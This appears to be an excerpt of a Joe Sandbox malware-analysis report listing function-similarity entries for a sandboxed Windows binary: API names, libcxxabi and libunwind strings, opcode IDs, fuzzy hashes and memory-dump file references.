                                      • API ID: realloc$mallocmemcpy
                                      • String ID: at offs$set
                                      • API String ID: 1059646398-2369781007
                                      • Opcode ID: ce501ce98fd795f4a36eda83ed67996a915afdf4059a98f1c7426f5b765f9e9f
                                      • Instruction ID: 333dd8302718aebcd5df4afcbbf7eff7d143707d926f5c4c775bda249ee4c724
                                      • Opcode Fuzzy Hash: ce501ce98fd795f4a36eda83ed67996a915afdf4059a98f1c7426f5b765f9e9f
                                      • Instruction Fuzzy Hash: 7DA1A6B2A06B8583DF298F56E85036D6362EB58BC4F188531DB9D477A6EF3CD591C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fputwc$memset
                                      • String ID: o$o$o$o$o$o
                                      • API String ID: 822753988-2858737866
                                      • Opcode ID: ec0378b7f33f77d8e7c97258e2461193ec11778b80df3b520114259e277ecf23
                                      • Instruction ID: 68ff8f07e754ed0d45d1dcfff105ea0d38809914d7edd7030361de76d537b55c
                                      • Opcode Fuzzy Hash: ec0378b7f33f77d8e7c97258e2461193ec11778b80df3b520114259e277ecf23
                                      • Instruction Fuzzy Hash: AC91E622E1824286F7754E16E2857396AF3AF147A4F289134DB6ED67D3DE3CF8818700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: restric$ volatil
                                      • API String ID: 471065373-3617781792
                                      • Opcode ID: db856f784eeb75ae2a2894c94dec506f6a3f145af6371b9ba82dd0594c7acb52
                                      • Instruction ID: 9e1d2deeace127755b703910320b7b63b3bf25d4591e7a3c47318b5509ff7589
                                      • Opcode Fuzzy Hash: db856f784eeb75ae2a2894c94dec506f6a3f145af6371b9ba82dd0594c7acb52
                                      • Instruction Fuzzy Hash: 90B132B6A05B8683EF29DF56E55426DB762EB54BC0F148831CB9E877A1EF2CE4518300
                                      APIs
                                      Strings
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099D005E
                                      • Index < size() && "Invalid access!", xrefs: 00007FF6099D0057
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: freememcpyrealloc$_assertmalloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Index < size() && "Invalid access!"
                                      • API String ID: 3641880838-4289452498
                                      • Opcode ID: 14559c1bef0205f1bddb7d762293130f666c23255001db772909319ea83ab9bc
                                      • Instruction ID: 410e02cb2544ab3b6482124c92b75361ec7177847b9121e4ee2adc523d253454
                                      • Opcode Fuzzy Hash: 14559c1bef0205f1bddb7d762293130f666c23255001db772909319ea83ab9bc
                                      • Instruction Fuzzy Hash: D451DB63A1AB4592EA60DF15F98027D6762FB98BD4F284131EE8D47B56DF3CD481C300
                                      APIs
                                      Strings
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C1E5C
                                      • starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6099C1E55
                                      • _, xrefs: 00007FF6099C198D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: _assertmallocmemcpyrealloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$_$starts_with(Res, "operator") && "operator name does not start with 'operator'"
                                      • API String ID: 2036919697-1558868925
                                      • Opcode ID: 679a2847ca810ef046ab7b588b6ce72a6a5788b1c42471ad5ebca2e9f2d48802
                                      • Instruction ID: 3bd5e45b06457858cc8b7e8e7ea949f51512edb02b2fd12ed336a57028881653
                                      • Opcode Fuzzy Hash: 679a2847ca810ef046ab7b588b6ce72a6a5788b1c42471ad5ebca2e9f2d48802
                                      • Instruction Fuzzy Hash: 5D6194B260AB4682EE71DF15E84027A67A6EB54780F680835DB8E87793DF3CF544C344
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy$malloc
                                      • String ID:
                                      • API String ID: 774493741-0
                                      • Opcode ID: 81f55bab3f375e8d77c0eab75715e2722c19bbdd34e8aaf7ba5827377f0e3e99
                                      • Instruction ID: d277f17837d46f90310ed2c7e5674bfff4ec73dc69375cd2cd23e62bf9a4f5ab
                                      • Opcode Fuzzy Hash: 81f55bab3f375e8d77c0eab75715e2722c19bbdd34e8aaf7ba5827377f0e3e99
                                      • Instruction Fuzzy Hash: 5CA183B2A05B8683EE25CF56E8442ADA3A6EB647C0F188531CF9D47792EF3CE5518300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: 91c14e38613bf2ef24675708493fc072fa46aa459f950d142766af95f801b6d9
                                      • Instruction ID: 91dd998e758b4f1b4015fbf2adeb7d1b45adef8d5c78eafa64fd65dd1ede1a3a
                                      • Opcode Fuzzy Hash: 91c14e38613bf2ef24675708493fc072fa46aa459f950d142766af95f801b6d9
                                      • Instruction Fuzzy Hash: 55A163F2A06B4293DA29CF56F854369B3A2EB587C0F588531DB9E47796EF3CE4518300
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: 404f2b5ef2ef1ca89c18a83dc03043f38f12fb85a76960961c0867d0112dc419
                                      • Instruction ID: 884ebe83dadb482ef237d7ace53ef703bead77775638b6726aa1d31f9c7f05e3
                                      • Opcode Fuzzy Hash: 404f2b5ef2ef1ca89c18a83dc03043f38f12fb85a76960961c0867d0112dc419
                                      • Instruction Fuzzy Hash: F7026372A1925287E7748E56E29073A77B2EB94740F285239DB9EC6F82DF2DF540C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fputc
                                      • String ID: .
                                      • API String ID: 1992160199-248832578
                                      • Opcode ID: 787fcf644351c96b12129b903d4882cc17bbf885cf22506cf1a7f1494b5e88d3
                                      • Instruction ID: 70204cde06233f368e6a995e258bc1c71546f05591475046761e6780990863a5
                                      • Opcode Fuzzy Hash: 787fcf644351c96b12129b903d4882cc17bbf885cf22506cf1a7f1494b5e88d3
                                      • Instruction Fuzzy Hash: 05F15072A0A24287F7798F16E1D073E77A2EB15750F684135DBAA86B86DF2CF841C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: string literal$struct
                                      • API String ID: 471065373-3644149429
                                      • Opcode ID: edf70fb810bf94ab848eb3daabb1ff00f60fb926d8302909fc9aec54d1f694de
                                      • Instruction ID: 9287e2e63d3f38b54b8f1559414dffc84c72f0f8a1a63f496db01073c99df67a
                                      • Opcode Fuzzy Hash: edf70fb810bf94ab848eb3daabb1ff00f60fb926d8302909fc9aec54d1f694de
                                      • Instruction Fuzzy Hash: 8DD1C0B2A0AB8645EE658F15AA403B966E7AF18784F6C4531CB9D877C3EF3CE451C300
                                      APIs
                                      Strings
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C1E5C
                                      • starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6099C1E55
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: mallocmemcpy
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
                                      • API String ID: 4276657696-3503049562
                                      • Opcode ID: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
                                      • Instruction ID: dd1643f7bee13884386d6bdee1602359490d73c137cf56acdebb7a7add32f58a
                                      • Opcode Fuzzy Hash: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
                                      • Instruction Fuzzy Hash: 85717F72609B4682EE719F15F8402AA63A6FB55780F684435DB8E87B97DF3CE444C344
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fwprintf$fputwcstrlen
                                      • String ID: %*.*S$%-*.*S$%.*S
                                      • API String ID: 3854221471-2115465065
                                      • Opcode ID: 98557c05d587b3aa904965f6ccec36304c4a609c4168c198159b4ee53df767b9
                                      • Instruction ID: 592bd44fc596ec09c790478523a9f5e9798083067e69b1d23b812a27f1ea4226
                                      • Opcode Fuzzy Hash: 98557c05d587b3aa904965f6ccec36304c4a609c4168c198159b4ee53df767b9
                                      • Instruction Fuzzy Hash: 1D515372A196568BE7748F16E55063A73B2EB48B60F284139DB5EC7792DF3CF8418B00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: abortfflush$UnwindVirtual
                                      • String ID: float registers unimplemented$getFloatReg$libunwind: %s - %s$setFloatReg
                                      • API String ID: 3704712045-981669299
                                      • Opcode ID: c81ff4b8b519b7b76abbc2ebb3b43e5cc1aa211c4902d7b55f271be843bc12e9
                                      • Instruction ID: a2d3bd1147adeed5a3f114d22b7d9e0950224c5797228278898a5d30736ba7a2
                                      • Opcode Fuzzy Hash: c81ff4b8b519b7b76abbc2ebb3b43e5cc1aa211c4902d7b55f271be843bc12e9
                                      • Instruction Fuzzy Hash: C6317561A0AB5682EB14FF65F8953B96366FB44784F284036DA8E93753DE3CD546C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fputwcfwprintf
                                      • String ID: %*.*s$%-*.*s$%.*s$%s
                                      • API String ID: 3232229890-407542676
                                      • Opcode ID: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
                                      • Instruction ID: 373ce3b6ce4742ca176661ab4567f3bcb80f8080cc0fd022ca840eca5553e7fa
                                      • Opcode Fuzzy Hash: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
                                      • Instruction Fuzzy Hash: 9D51E372A155068BF7788E1AE65063E73B2EF54760B288139DB5EC7793DE2CF8418B00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$_assertmemcpy
                                      • String ID: 'unnamed$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists
                                      • API String ID: 2140428464-3850676658
                                      • Opcode ID: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
                                      • Instruction ID: 352b84e34f17f4d7c6657e95bfc48ff271ac172f7dddad592e4b562a8a2549d7
                                      • Opcode Fuzzy Hash: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
                                      • Instruction Fuzzy Hash: C84166F6A06B4282DE18CF46E95427963A2EB58BC4F688531CB9D47792EF3CD4918300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: _assertmalloc$memcpy
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$FromPosition <= Names.size()$Index <= size() && "dropBack() can't expand!"
                                      • API String ID: 4247363904-2992651634
                                      • Opcode ID: ab644f2095f0de27027b3e7fa25ecf4aaf29523574def526dacc6e54c99405ee
                                      • Instruction ID: e696e0a55b1221cdba69bfa0bd667a8fa36313c64961bafedcf5e2fd03df7002
                                      • Opcode Fuzzy Hash: ab644f2095f0de27027b3e7fa25ecf4aaf29523574def526dacc6e54c99405ee
                                      • Instruction Fuzzy Hash: 7B41E2B2719A0681EA249F05F9447A97766FB447C4F6D8035EE4C8B792EE7CE584C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fflush$Unwindabort
                                      • String ID: _Unwind_Resume$_Unwind_Resume() can't return$libunwind: %s - %s$libunwind: _Unwind_Resume(ex_obj=%p)
                                      • API String ID: 3252057912-3900785416
                                      • Opcode ID: 67d0ddd8d3f3b324f54b87a857e904e5ecbaa43cf9483693f48d384fd3c00ca7
                                      • Instruction ID: a6df5b29c5f13cf7c1ff9f024a0674de0c746314a32dae05ee0afa45c6d102c2
                                      • Opcode Fuzzy Hash: 67d0ddd8d3f3b324f54b87a857e904e5ecbaa43cf9483693f48d384fd3c00ca7
                                      • Instruction Fuzzy Hash: 70415B21D0DBC182F6369B15A5063F9A375FFE9384F145226EA8802766EF7DD2D28740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
